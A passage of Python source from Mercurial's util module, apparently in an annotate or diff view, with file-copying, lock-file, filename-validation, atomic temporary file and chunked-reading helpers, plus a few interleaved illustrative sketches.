1483 1483 env=env, cwd=cwd, stdout=subprocess.PIPE,
1484 1484 stderr=subprocess.STDOUT)
1485 1485 for line in iter(proc.stdout.readline, ''):
1486 1486 out.write(line)
1487 1487 proc.wait()
1488 1488 rc = proc.returncode
1489 1489 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1490 1490 rc = 0
1491 1491 return rc
1492 1492
1493 1493 def checksignature(func):
1494 1494 '''wrap a function with code to check for calling errors'''
1495 1495 def check(*args, **kwargs):
1496 1496 try:
1497 1497 return func(*args, **kwargs)
1498 1498 except TypeError:
1499 1499 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1500 1500 raise error.SignatureError
1501 1501 raise
1502 1502
1503 1503 return check
1504 1504
1505 1505 # a whitelist of known filesystems where hardlink works reliably
1506 1506 _hardlinkfswhitelist = {
1507 1507 'btrfs',
1508 1508 'ext2',
1509 1509 'ext3',
1510 1510 'ext4',
1511 1511 'hfs',
1512 1512 'jfs',
1513 1513 'NTFS',
1514 1514 'reiserfs',
1515 1515 'tmpfs',
1516 1516 'ufs',
1517 1517 'xfs',
1518 1518 'zfs',
1519 1519 }
1520 1520
1521 1521 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1522 1522 '''copy a file, preserving mode and optionally other stat info like
1523 1523 atime/mtime
1524 1524
1525 1525 checkambig argument is used with filestat, and is useful only if
1526 1526 destination file is guarded by any lock (e.g. repo.lock or
1527 1527 repo.wlock).
1528 1528
1529 1529 copystat and checkambig should be exclusive.
1530 1530 '''
1531 1531 assert not (copystat and checkambig)
1532 1532 oldstat = None
1533 1533 if os.path.lexists(dest):
1534 1534 if checkambig:
1535 1535 oldstat = checkambig and filestat.frompath(dest)
1536 1536 unlink(dest)
1537 1537 if hardlink:
1538 1538 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1539 1539 # unless we are confident that dest is on a whitelisted filesystem.
1540 1540 try:
1541 1541 fstype = getfstype(os.path.dirname(dest))
1542 1542 except OSError:
1543 1543 fstype = None
1544 1544 if fstype not in _hardlinkfswhitelist:
1545 1545 hardlink = False
1546 1546 if hardlink:
1547 1547 try:
1548 1548 oslink(src, dest)
1549 1549 return
1550 1550 except (IOError, OSError):
1551 1551 pass # fall back to normal copy
1552 1552 if os.path.islink(src):
1553 1553 os.symlink(os.readlink(src), dest)
1554 1554 # copytime is ignored for symlinks, but in general copytime isn't needed
1555 1555 # for them anyway
1556 1556 else:
1557 1557 try:
1558 1558 shutil.copyfile(src, dest)
1559 1559 if copystat:
1560 1560 # copystat also copies mode
1561 1561 shutil.copystat(src, dest)
1562 1562 else:
1563 1563 shutil.copymode(src, dest)
1564 1564 if oldstat and oldstat.stat:
1565 1565 newstat = filestat.frompath(dest)
1566 1566 if newstat.isambig(oldstat):
1567 1567 # stat of copied file is ambiguous to original one
1568 1568 advanced = (
1569 1569 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1570 1570 os.utime(dest, (advanced, advanced))
1571 1571 except shutil.Error as inst:
1572 1572 raise Abort(str(inst))
1573 1573
1574 1574 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1575 1575 """Copy a directory tree using hardlinks if possible."""
1576 1576 num = 0
1577 1577
1578 1578 gettopic = lambda: hardlink and _('linking') or _('copying')
1579 1579
1580 1580 if os.path.isdir(src):
1581 1581 if hardlink is None:
1582 1582 hardlink = (os.stat(src).st_dev ==
1583 1583 os.stat(os.path.dirname(dst)).st_dev)
1584 1584 topic = gettopic()
1585 1585 os.mkdir(dst)
1586 1586 for name, kind in listdir(src):
1587 1587 srcname = os.path.join(src, name)
1588 1588 dstname = os.path.join(dst, name)
1589 1589 def nprog(t, pos):
1590 1590 if pos is not None:
1591 1591 return progress(t, pos + num)
1592 1592 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1593 1593 num += n
1594 1594 else:
1595 1595 if hardlink is None:
1596 1596 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1597 1597 os.stat(os.path.dirname(dst)).st_dev)
1598 1598 topic = gettopic()
1599 1599
1600 1600 if hardlink:
1601 1601 try:
1602 1602 oslink(src, dst)
1603 1603 except (IOError, OSError):
1604 1604 hardlink = False
1605 1605 shutil.copy(src, dst)
1606 1606 else:
1607 1607 shutil.copy(src, dst)
1608 1608 num += 1
1609 1609 progress(topic, num)
1610 1610 progress(topic, None)
1611 1611
1612 1612 return hardlink, num
1613 1613
1614 1614 _winreservednames = {
1615 1615 'con', 'prn', 'aux', 'nul',
1616 1616 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1617 1617 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1618 1618 }
1619 1619 _winreservedchars = ':*?"<>|'
1620 1620 def checkwinfilename(path):
1621 1621 r'''Check that the base-relative path is a valid filename on Windows.
1622 1622 Returns None if the path is ok, or a UI string describing the problem.
1623 1623
1624 1624 >>> checkwinfilename(b"just/a/normal/path")
1625 1625 >>> checkwinfilename(b"foo/bar/con.xml")
1626 1626 "filename contains 'con', which is reserved on Windows"
1627 1627 >>> checkwinfilename(b"foo/con.xml/bar")
1628 1628 "filename contains 'con', which is reserved on Windows"
1629 1629 >>> checkwinfilename(b"foo/bar/xml.con")
1630 1630 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1631 1631 "filename contains 'AUX', which is reserved on Windows"
1632 1632 >>> checkwinfilename(b"foo/bar/bla:.txt")
1633 1633 "filename contains ':', which is reserved on Windows"
1634 1634 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1635 1635 "filename contains '\\x07', which is invalid on Windows"
1636 1636 >>> checkwinfilename(b"foo/bar/bla ")
1637 1637 "filename ends with ' ', which is not allowed on Windows"
1638 1638 >>> checkwinfilename(b"../bar")
1639 1639 >>> checkwinfilename(b"foo\\")
1640 1640 "filename ends with '\\', which is invalid on Windows"
1641 1641 >>> checkwinfilename(b"foo\\/bar")
1642 1642 "directory name ends with '\\', which is invalid on Windows"
1643 1643 '''
1644 1644 if path.endswith('\\'):
1645 1645 return _("filename ends with '\\', which is invalid on Windows")
1646 1646 if '\\/' in path:
1647 1647 return _("directory name ends with '\\', which is invalid on Windows")
1648 1648 for n in path.replace('\\', '/').split('/'):
1649 1649 if not n:
1650 1650 continue
1651 1651 for c in _filenamebytestr(n):
1652 1652 if c in _winreservedchars:
1653 1653 return _("filename contains '%s', which is reserved "
1654 1654 "on Windows") % c
1655 1655 if ord(c) <= 31:
1656 1656 return _("filename contains '%s', which is invalid "
1657 1657 "on Windows") % escapestr(c)
1658 1658 base = n.split('.')[0]
1659 1659 if base and base.lower() in _winreservednames:
1660 1660 return _("filename contains '%s', which is reserved "
1661 1661 "on Windows") % base
1662 1662 t = n[-1:]
1663 1663 if t in '. ' and n not in '..':
1664 1664 return _("filename ends with '%s', which is not allowed "
1665 1665 "on Windows") % t
1666 1666
1667 1667 if pycompat.iswindows:
1668 1668 checkosfilename = checkwinfilename
1669 1669 timer = time.clock
1670 1670 else:
1671 1671 checkosfilename = platform.checkosfilename
1672 1672 timer = time.time
1673 1673
1674 1674 if safehasattr(time, "perf_counter"):
1675 1675 timer = time.perf_counter
1676 1676
1677 1677 def makelock(info, pathname):
1678 1678 """Create a lock file atomically if possible
1679 1679
1680 1680 This may leave a stale lock file if symlink isn't supported and signal
1681 1681 interrupt is enabled.
1682 1682 """
1683 1683 try:
1684 1684 return os.symlink(info, pathname)
1685 1685 except OSError as why:
1686 1686 if why.errno == errno.EEXIST:
1687 1687 raise
1688 1688 except AttributeError: # no symlink in os
1689 1689 pass
1690 1690
1691 1691 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1692 1692 ld = os.open(pathname, flags)
1693 1693 os.write(ld, info)
1694 1694 os.close(ld)
1695 1695
1696 1696 def readlock(pathname):
1697 1697 try:
1698 1698 return os.readlink(pathname)
1699 1699 except OSError as why:
1700 1700 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1701 1701 raise
1702 1702 except AttributeError: # no symlink in os
1703 1703 pass
1704 1704 fp = posixfile(pathname, 'rb')
1705 1705 r = fp.read()
1706 1706 fp.close()
1707 1707 return r
1708 1708
1709 1709 def fstat(fp):
1710 1710 '''stat file object that may not have fileno method.'''
1711 1711 try:
1712 1712 return os.fstat(fp.fileno())
1713 1713 except AttributeError:
1714 1714 return os.stat(fp.name)
1715 1715
1716 1716 # File system features
1717 1717
1718 1718 def fscasesensitive(path):
1719 1719 """
1720 1720 Return true if the given path is on a case-sensitive filesystem
1721 1721
1722 1722 Requires a path (like /foo/.hg) ending with a foldable final
1723 1723 directory component.
1724 1724 """
1725 1725 s1 = os.lstat(path)
1726 1726 d, b = os.path.split(path)
1727 1727 b2 = b.upper()
1728 1728 if b == b2:
1729 1729 b2 = b.lower()
1730 1730 if b == b2:
1731 1731 return True # no evidence against case sensitivity
1732 1732 p2 = os.path.join(d, b2)
1733 1733 try:
1734 1734 s2 = os.lstat(p2)
1735 1735 if s2 == s1:
1736 1736 return False
1737 1737 return True
1738 1738 except OSError:
1739 1739 return True
1740 1740
1741 1741 try:
1742 1742 import re2
1743 1743 _re2 = None
1744 1744 except ImportError:
1745 1745 _re2 = False
1746 1746
1747 1747 class _re(object):
1748 1748 def _checkre2(self):
1749 1749 global _re2
1750 1750 try:
1751 1751 # check if match works, see issue3964
1752 1752 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1753 1753 except ImportError:
1754 1754 _re2 = False
1755 1755
1756 1756 def compile(self, pat, flags=0):
1757 1757 '''Compile a regular expression, using re2 if possible
1758 1758
1759 1759 For best performance, use only re2-compatible regexp features. The
1760 1760 only flags from the re module that are re2-compatible are
1761 1761 IGNORECASE and MULTILINE.'''
1762 1762 if _re2 is None:
1763 1763 self._checkre2()
1764 1764 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1765 1765 if flags & remod.IGNORECASE:
1766 1766 pat = '(?i)' + pat
1767 1767 if flags & remod.MULTILINE:
1768 1768 pat = '(?m)' + pat
1769 1769 try:
1770 1770 return re2.compile(pat)
1771 1771 except re2.error:
1772 1772 pass
1773 1773 return remod.compile(pat, flags)
1774 1774
1775 1775 @propertycache
1776 1776 def escape(self):
1777 1777 '''Return the version of escape corresponding to self.compile.
1778 1778
1779 1779 This is imperfect because whether re2 or re is used for a particular
1780 1780 function depends on the flags, etc, but it's the best we can do.
1781 1781 '''
1782 1782 global _re2
1783 1783 if _re2 is None:
1784 1784 self._checkre2()
1785 1785 if _re2:
1786 1786 return re2.escape
1787 1787 else:
1788 1788 return remod.escape
1789 1789
1790 1790 re = _re()
1791 1791
1792 1792 _fspathcache = {}
1793 1793 def fspath(name, root):
1794 1794 '''Get name in the case stored in the filesystem
1795 1795
1796 1796 The name should be relative to root, and be normcase-ed for efficiency.
1797 1797
1798 1798 Note that this function is unnecessary, and should not be
1799 1799 called, for case-sensitive filesystems (simply because it's expensive).
1800 1800
1801 1801 The root should be normcase-ed, too.
1802 1802 '''
1803 1803 def _makefspathcacheentry(dir):
1804 1804 return dict((normcase(n), n) for n in os.listdir(dir))
1805 1805
1806 1806 seps = pycompat.ossep
1807 1807 if pycompat.osaltsep:
1808 1808 seps = seps + pycompat.osaltsep
1809 1809 # Protect backslashes. This gets silly very quickly.
1810 1810     seps = seps.replace('\\', '\\\\')
1811 1811 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1812 1812 dir = os.path.normpath(root)
1813 1813 result = []
1814 1814 for part, sep in pattern.findall(name):
1815 1815 if sep:
1816 1816 result.append(sep)
1817 1817 continue
1818 1818
1819 1819 if dir not in _fspathcache:
1820 1820 _fspathcache[dir] = _makefspathcacheentry(dir)
1821 1821 contents = _fspathcache[dir]
1822 1822
1823 1823 found = contents.get(part)
1824 1824 if not found:
1825 1825             # retry "once per directory" per "dirstate.walk" which
1826 1826             # may take place for each patch of "hg qpush", for example
1827 1827 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1828 1828 found = contents.get(part)
1829 1829
1830 1830 result.append(found or part)
1831 1831 dir = os.path.join(dir, part)
1832 1832
1833 1833 return ''.join(result)
1834 1834
1835 1835 def checknlink(testfile):
1836 1836 '''check whether hardlink count reporting works properly'''
1837 1837
1838 1838 # testfile may be open, so we need a separate file for checking to
1839 1839 # work around issue2543 (or testfile may get lost on Samba shares)
1840 1840 f1, f2, fp = None, None, None
1841 1841 try:
1842 1842 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1843 1843 suffix='1~', dir=os.path.dirname(testfile))
1844 1844 os.close(fd)
1845 1845 f2 = '%s2~' % f1[:-2]
1846 1846
1847 1847 oslink(f1, f2)
1848 1848 # nlinks() may behave differently for files on Windows shares if
1849 1849 # the file is open.
1850 1850 fp = posixfile(f2)
1851 1851 return nlinks(f2) > 1
1852 1852 except OSError:
1853 1853 return False
1854 1854 finally:
1855 1855 if fp is not None:
1856 1856 fp.close()
1857 1857 for f in (f1, f2):
1858 1858 try:
1859 1859 if f is not None:
1860 1860 os.unlink(f)
1861 1861 except OSError:
1862 1862 pass
1863 1863
1864 1864 def endswithsep(path):
1865 1865 '''Check path ends with os.sep or os.altsep.'''
1866 1866 return (path.endswith(pycompat.ossep)
1867 1867 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1868 1868
1869 1869 def splitpath(path):
1870 1870 '''Split path by os.sep.
1871 1871     Note that this function does not use os.altsep because this is
1872 1872     an alternative to the simple "xxx.split(os.sep)".
1873 1873     It is recommended to use os.path.normpath() before using this
1874 1874     function if needed.'''
1875 1875 return path.split(pycompat.ossep)
1876 1876
1877 1877 def gui():
1878 1878 '''Are we running in a GUI?'''
1879 1879 if pycompat.isdarwin:
1880 1880 if 'SSH_CONNECTION' in encoding.environ:
1881 1881 # handle SSH access to a box where the user is logged in
1882 1882 return False
1883 1883 elif getattr(osutil, 'isgui', None):
1884 1884 # check if a CoreGraphics session is available
1885 1885 return osutil.isgui()
1886 1886 else:
1887 1887 # pure build; use a safe default
1888 1888 return True
1889 1889 else:
1890 1890 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1891 1891
1892 1892 def mktempcopy(name, emptyok=False, createmode=None):
1893 1893 """Create a temporary file with the same contents from name
1894 1894
1895 1895 The permission bits are copied from the original file.
1896 1896
1897 1897 If the temporary file is going to be truncated immediately, you
1898 1898 can use emptyok=True as an optimization.
1899 1899
1900 1900 Returns the name of the temporary file.
1901 1901 """
1902 1902 d, fn = os.path.split(name)
1903 1903 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1904 1904 os.close(fd)
1905 1905 # Temporary files are created with mode 0600, which is usually not
1906 1906 # what we want. If the original file already exists, just copy
1907 1907 # its mode. Otherwise, manually obey umask.
1908 1908 copymode(name, temp, createmode)
1909 1909 if emptyok:
1910 1910 return temp
1911 1911 try:
1912 1912 try:
1913 1913 ifp = posixfile(name, "rb")
1914 1914 except IOError as inst:
1915 1915 if inst.errno == errno.ENOENT:
1916 1916 return temp
1917 1917 if not getattr(inst, 'filename', None):
1918 1918 inst.filename = name
1919 1919 raise
1920 1920 ofp = posixfile(temp, "wb")
1921 1921 for chunk in filechunkiter(ifp):
1922 1922 ofp.write(chunk)
1923 1923 ifp.close()
1924 1924 ofp.close()
1925 1925 except: # re-raises
1926 1926 try:
1927 1927 os.unlink(temp)
1928 1928 except OSError:
1929 1929 pass
1930 1930 raise
1931 1931 return temp
1932 1932
1933 1933 class filestat(object):
1934 1934 """help to exactly detect change of a file
1935 1935
1936 1936     The 'stat' attribute is the result of 'os.stat()' if the specified
1937 1937     'path' exists. Otherwise, it is None. This saves callers of this
1938 1938     class a preparatory 'exists()' check.
1939 1939 """
1940 1940 def __init__(self, stat):
1941 1941 self.stat = stat
1942 1942
1943 1943 @classmethod
1944 1944 def frompath(cls, path):
1945 1945 try:
1946 1946 stat = os.stat(path)
1947 1947 except OSError as err:
1948 1948 if err.errno != errno.ENOENT:
1949 1949 raise
1950 1950 stat = None
1951 1951 return cls(stat)
1952 1952
1953 1953 @classmethod
1954 1954 def fromfp(cls, fp):
1955 1955 stat = os.fstat(fp.fileno())
1956 1956 return cls(stat)
1957 1957
1958 1958 __hash__ = object.__hash__
1959 1959
1960 1960 def __eq__(self, old):
1961 1961 try:
1962 1962 # if ambiguity between stat of new and old file is
1963 1963 # avoided, comparison of size, ctime and mtime is enough
1964 1964 # to exactly detect change of a file regardless of platform
1965 1965 return (self.stat.st_size == old.stat.st_size and
1966 1966 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1967 1967 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1968 1968 except AttributeError:
1969 1969 pass
1970 1970 try:
1971 1971 return self.stat is None and old.stat is None
1972 1972 except AttributeError:
1973 1973 return False
1974 1974
1975 1975 def isambig(self, old):
1976 1976 """Examine whether new (= self) stat is ambiguous against old one
1977 1977
1978 1978 "S[N]" below means stat of a file at N-th change:
1979 1979
1980 1980 - S[n-1].ctime < S[n].ctime: can detect change of a file
1981 1981 - S[n-1].ctime == S[n].ctime
1982 1982 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1983 1983 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1984 1984 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1985 1985 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1986 1986
1987 1987 Case (*2) above means that a file was changed twice or more at
1988 1988 same time in sec (= S[n-1].ctime), and comparison of timestamp
1989 1989 is ambiguous.
1990 1990
1991 1991         The basic idea to avoid such ambiguity is "advance the mtime by
1992 1992         1 sec if the timestamp is ambiguous".
1993 1993
1994 1994 But advancing mtime only in case (*2) doesn't work as
1995 1995 expected, because naturally advanced S[n].mtime in case (*1)
1996 1996 might be equal to manually advanced S[n-1 or earlier].mtime.
1997 1997
1998 1998         Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1999 1999         treated as ambiguous regardless of mtime, to avoid overlooking
2000 2000         a change masked by a collision between such mtimes.
2001 2001
2002 2002 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2003 2003 S[n].mtime", even if size of a file isn't changed.
2004 2004 """
2005 2005 try:
2006 2006 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2007 2007 except AttributeError:
2008 2008 return False
2009 2009
2010 2010 def avoidambig(self, path, old):
2011 2011 """Change file stat of specified path to avoid ambiguity
2012 2012
2013 2013 'old' should be previous filestat of 'path'.
2014 2014
2015 2015         This skips avoiding ambiguity if the process doesn't have
2016 2016         appropriate privileges for 'path', and returns False in that
2017 2017         case.
2018 2018
2019 2019 Otherwise, this returns True, as "ambiguity is avoided".
2020 2020 """
2021 2021 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2022 2022 try:
2023 2023 os.utime(path, (advanced, advanced))
2024 2024 except OSError as inst:
2025 2025 if inst.errno == errno.EPERM:
2026 2026 # utime() on the file created by another user causes EPERM,
2027 2027 # if a process doesn't have appropriate privileges
2028 2028 return False
2029 2029 raise
2030 2030 return True
2031 2031
2032 2032 def __ne__(self, other):
2033 2033 return not self == other
2034 2034
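# Editor's note: illustrative sketch, not part of the original source.
# The ambiguity handling described in isambig()/avoidambig(), in the
# order a caller would use it after rewriting 'path':
def _example_avoidambig(path, oldstat):
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        # bumps mtime to (old mtime + 1) & 0x7fffffff
        newstat.avoidambig(path, oldstat)
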
2035 2035 class atomictempfile(object):
2036 2036 '''writable file object that atomically updates a file
2037 2037
2038 2038 All writes will go to a temporary copy of the original file. Call
2039 2039 close() when you are done writing, and atomictempfile will rename
2040 2040 the temporary copy to the original name, making the changes
2041 2041 visible. If the object is destroyed without being closed, all your
2042 2042 writes are discarded.
2043 2043
2044 2044 checkambig argument of constructor is used with filestat, and is
2045 2045 useful only if target file is guarded by any lock (e.g. repo.lock
2046 2046 or repo.wlock).
2047 2047 '''
2048 2048 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2049 2049 self.__name = name # permanent name
2050 2050 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2051 2051 createmode=createmode)
2052 2052 self._fp = posixfile(self._tempname, mode)
2053 2053 self._checkambig = checkambig
2054 2054
2055 2055 # delegated methods
2056 2056 self.read = self._fp.read
2057 2057 self.write = self._fp.write
2058 2058 self.seek = self._fp.seek
2059 2059 self.tell = self._fp.tell
2060 2060 self.fileno = self._fp.fileno
2061 2061
2062 2062 def close(self):
2063 2063 if not self._fp.closed:
2064 2064 self._fp.close()
2065 2065 filename = localpath(self.__name)
2066 2066 oldstat = self._checkambig and filestat.frompath(filename)
2067 2067 if oldstat and oldstat.stat:
2068 2068 rename(self._tempname, filename)
2069 2069 newstat = filestat.frompath(filename)
2070 2070 if newstat.isambig(oldstat):
2071 2071 # stat of changed file is ambiguous to original one
2072 2072 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2073 2073 os.utime(filename, (advanced, advanced))
2074 2074 else:
2075 2075 rename(self._tempname, filename)
2076 2076
2077 2077 def discard(self):
2078 2078 if not self._fp.closed:
2079 2079 try:
2080 2080 os.unlink(self._tempname)
2081 2081 except OSError:
2082 2082 pass
2083 2083 self._fp.close()
2084 2084
2085 2085 def __del__(self):
2086 2086 if safehasattr(self, '_fp'): # constructor actually did something
2087 2087 self.discard()
2088 2088
2089 2089 def __enter__(self):
2090 2090 return self
2091 2091
2092 2092 def __exit__(self, exctype, excvalue, traceback):
2093 2093 if exctype is not None:
2094 2094 self.discard()
2095 2095 else:
2096 2096 self.close()
2097 2097
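# Illustrative sketch (not part of the original file): typical use of
# atomictempfile as a context manager; the path below is hypothetical.
def _atomictempfiledemo(path=b'somefile'):
    # all writes land in a temporary copy; on a clean exit __exit__()
    # calls close(), which renames the copy over 'path' in one step, so
    # readers never observe a half-written file; on an exception the
    # temporary copy is discarded instead
    with atomictempfile(path, b'wb') as fp:
        fp.write(b'first chunk\n')
        fp.write(b'second chunk\n')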
2098 2098 def unlinkpath(f, ignoremissing=False):
2099 2099 """unlink and remove the directory if it is empty"""
2100 2100 if ignoremissing:
2101 2101 tryunlink(f)
2102 2102 else:
2103 2103 unlink(f)
2104 2104 # try removing directories that might now be empty
2105 2105 try:
2106 2106 removedirs(os.path.dirname(f))
2107 2107 except OSError:
2108 2108 pass
2109 2109
2110 2110 def tryunlink(f):
2111 2111 """Attempt to remove a file, ignoring ENOENT errors."""
2112 2112 try:
2113 2113 unlink(f)
2114 2114 except OSError as e:
2115 2115 if e.errno != errno.ENOENT:
2116 2116 raise
2117 2117
2118 2118 def makedirs(name, mode=None, notindexed=False):
2119 2119 """recursive directory creation with parent mode inheritance
2120 2120
2121 2121 Newly created directories are marked as "not to be indexed by
2122 2122 the content indexing service", if ``notindexed`` is specified
2123 2123 for "write" mode access.
2124 2124 """
2125 2125 try:
2126 2126 makedir(name, notindexed)
2127 2127 except OSError as err:
2128 2128 if err.errno == errno.EEXIST:
2129 2129 return
2130 2130 if err.errno != errno.ENOENT or not name:
2131 2131 raise
2132 2132 parent = os.path.dirname(os.path.abspath(name))
2133 2133 if parent == name:
2134 2134 raise
2135 2135 makedirs(parent, mode, notindexed)
2136 2136 try:
2137 2137 makedir(name, notindexed)
2138 2138 except OSError as err:
2139 2139 # Catch EEXIST to handle races
2140 2140 if err.errno == errno.EEXIST:
2141 2141 return
2142 2142 raise
2143 2143 if mode is not None:
2144 2144 os.chmod(name, mode)
2145 2145
2146 2146 def readfile(path):
2147 2147 with open(path, 'rb') as fp:
2148 2148 return fp.read()
2149 2149
2150 2150 def writefile(path, text):
2151 2151 with open(path, 'wb') as fp:
2152 2152 fp.write(text)
2153 2153
2154 2154 def appendfile(path, text):
2155 2155 with open(path, 'ab') as fp:
2156 2156 fp.write(text)
2157 2157
2158 2158 class chunkbuffer(object):
2159 2159 """Allow arbitrary sized chunks of data to be efficiently read from an
2160 2160 iterator over chunks of arbitrary size."""
2161 2161
2162 2162 def __init__(self, in_iter):
2163 2163 """in_iter is the iterator that's iterating over the input chunks."""
2164 2164 def splitbig(chunks):
2165 2165 for chunk in chunks:
2166 2166 if len(chunk) > 2**20:
2167 2167 pos = 0
2168 2168 while pos < len(chunk):
2169 2169 end = pos + 2 ** 18
2170 2170 yield chunk[pos:end]
2171 2171 pos = end
2172 2172 else:
2173 2173 yield chunk
2174 2174 self.iter = splitbig(in_iter)
2175 2175 self._queue = collections.deque()
2176 2176 self._chunkoffset = 0
2177 2177
2178 2178 def read(self, l=None):
2179 2179 """Read L bytes of data from the iterator of chunks of data.
2180 2180 Returns less than L bytes if the iterator runs dry.
2181 2181
2182 2182 If the size parameter is omitted, read everything."""
2183 2183 if l is None:
2184 2184 return ''.join(self.iter)
2185 2185
2186 2186 left = l
2187 2187 buf = []
2188 2188 queue = self._queue
2189 2189 while left > 0:
2190 2190 # refill the queue
2191 2191 if not queue:
2192 2192 target = 2**18
2193 2193 for chunk in self.iter:
2194 2194 queue.append(chunk)
2195 2195 target -= len(chunk)
2196 2196 if target <= 0:
2197 2197 break
2198 2198 if not queue:
2199 2199 break
2200 2200
2201 2201 # The easy way to do this would be to queue.popleft(), modify the
2202 2202 # chunk (if necessary), then queue.appendleft(). However, for cases
2203 2203 # where we read partial chunk content, this incurs 2 dequeue
2204 2204 # mutations and creates a new str for the remaining chunk in the
2205 2205 # queue. Our code below avoids this overhead.
2206 2206
2207 2207 chunk = queue[0]
2208 2208 chunkl = len(chunk)
2209 2209 offset = self._chunkoffset
2210 2210
2211 2211 # Use full chunk.
2212 2212 if offset == 0 and left >= chunkl:
2213 2213 left -= chunkl
2214 2214 queue.popleft()
2215 2215 buf.append(chunk)
2216 2216 # self._chunkoffset remains at 0.
2217 2217 continue
2218 2218
2219 2219 chunkremaining = chunkl - offset
2220 2220
2221 2221 # Use all of unconsumed part of chunk.
2222 2222 if left >= chunkremaining:
2223 2223 left -= chunkremaining
2224 2224 queue.popleft()
2225 2225 # The offset == 0 case is handled by the block above, so offset is
2226 2226 # non-zero here and this won't merely copy via ``chunk[0:]``.
2227 2227 buf.append(chunk[offset:])
2228 2228 self._chunkoffset = 0
2229 2229
2230 2230 # Partial chunk needed.
2231 2231 else:
2232 2232 buf.append(chunk[offset:offset + left])
2233 2233 self._chunkoffset += left
2234 2234 left -= chunkremaining
2235 2235
2236 2236 return ''.join(buf)
2237 2237
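# Illustrative sketch (not part of the original file): chunkbuffer
# re-chunks an iterator of arbitrarily sized chunks into reads of the
# caller's choosing.
def _chunkbufferdemo():
    buf = chunkbuffer(iter([b'ab', b'cdef', b'g']))
    assert buf.read(3) == b'abc'   # spans the first two input chunks
    assert buf.read(4) == b'defg'  # drains the remainder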
2238 2238 def filechunkiter(f, size=131072, limit=None):
2239 2239 """Create a generator that produces the data in the file size
2240 2240 (default 131072) bytes at a time, up to optional limit (default is
2241 2241 to read all data). Chunks may be less than size bytes if the
2242 2242 chunk is the last chunk in the file, or the file is a socket or
2243 2243 some other type of file that sometimes reads less data than is
2244 2244 requested."""
2245 2245 assert size >= 0
2246 2246 assert limit is None or limit >= 0
2247 2247 while True:
2248 2248 if limit is None:
2249 2249 nbytes = size
2250 2250 else:
2251 2251 nbytes = min(limit, size)
2252 2252 s = nbytes and f.read(nbytes)
2253 2253 if not s:
2254 2254 break
2255 2255 if limit:
2256 2256 limit -= len(s)
2257 2257 yield s
2258 2258
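# Illustrative sketch (not part of the original file): reading a file in
# fixed-size chunks, with and without a byte limit; stringio is the
# in-memory file type defined earlier in this module.
def _filechunkiterdemo():
    fh = stringio(b'x' * 300000)
    assert [len(c) for c in filechunkiter(fh)] == [131072, 131072, 37856]
    fh.seek(0)
    assert list(filechunkiter(fh, limit=5)) == [b'xxxxx']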
2259 2259 class cappedreader(object):
2260 2260 """A file object proxy that allows reading up to N bytes.
2261 2261
2262 2262 Given a source file object, instances of this type allow reading up to
2263 2263 N bytes from that source file object. Attempts to read past the allowed
2264 2264 limit are treated as EOF.
2265 2265
2266 2266 It is assumed that I/O is not performed on the original file object
2267 2267 in addition to I/O that is performed by this instance. If there is,
2268 2268 state tracking will get out of sync and unexpected results will ensue.
2269 2269 """
2270 2270 def __init__(self, fh, limit):
2271 2271 """Allow reading up to <limit> bytes from <fh>."""
2272 2272 self._fh = fh
2273 2273 self._left = limit
2274 2274
2275 2275 def read(self, n=-1):
2276 2276 if not self._left:
2277 2277 return b''
2278 2278
2279 2279 if n < 0:
2280 2280 n = self._left
2281 2281
2282 2282 data = self._fh.read(min(n, self._left))
2283 2283 self._left -= len(data)
2284 2284 assert self._left >= 0
2285 2285
2286 2286 return data
2287 2287
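# Illustrative sketch (not part of the original file): cappedreader
# presents at most 'limit' bytes of the source; past the cap it behaves
# as if EOF were reached.
def _cappedreaderdemo():
    capped = cappedreader(stringio(b'0123456789'), 4)
    assert capped.read(3) == b'012'
    assert capped.read(3) == b'3'   # only one byte left under the cap
    assert capped.read(3) == b''    # treated as EOF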
2288 2288 def stringmatcher(pattern, casesensitive=True):
2289 2289 """
2290 2290 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2291 2291 returns the matcher name, pattern, and matcher function.
2292 2292 missing or unknown prefixes are treated as literal matches.
2293 2293
2294 2294 helper for tests:
2295 2295 >>> def test(pattern, *tests):
2296 2296 ... kind, pattern, matcher = stringmatcher(pattern)
2297 2297 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2298 2298 >>> def itest(pattern, *tests):
2299 2299 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
